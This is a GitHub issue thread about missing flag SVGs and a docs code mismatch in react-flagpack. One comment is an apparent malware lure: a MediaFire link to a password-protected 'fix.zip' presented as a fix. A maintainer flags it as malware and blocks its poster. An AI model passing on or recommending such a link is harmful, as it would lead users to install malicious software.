### ISSUE TITLE
Missing Flags

### ISSUE THREAD

**Issue by martinbartolo** [Yummygum/react-flagpack#76]
It seems that the following flags in the index are missing svgs in all sizes.

- EU
- AFRUN
- UNASUR
- RAINBOW

Additionally, The svg for Saint Kitts and Nevis is listed as "KN-SK" in the docs but the current alpha2 code to access the file is "KN".

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zoeyfrisart** [comment]
Hi there,
Apologies for the comment above; please don't click that link. The user appears to be attempting to spread malware.
We've blocked the user from making further comments in the repository.

Those flags used to be a part of Flagpack but have been removed after consideration when we moved to standardizing what flags are supported by Flagpack. The fact that they are still in the docs is by mistake, I've created an internal note that we need to resolve this.

If you wish to get the flags mentioned they are a part of flagpack 1.0.0 so you can grab them there https://github.com/Yummygum/flagpack-core/tree/v1.0.0

Flagpack uses the officially assigned ISO country codes as truth. Because of this some flags might not be included in Flagpack. Please refer to the officially assigned country codes on [[the ISO website](https://www.iso.org/obp/ui/#home)](https://www.iso.org/obp/ui/#home) to see which flags should be included in Flagpack.

We would like to note that the flag(s) you're suggesting do not align with the officially assigned ISO country codes and therefore will not be added to Flagpack. We're sorry for the inconvenience this may cause.
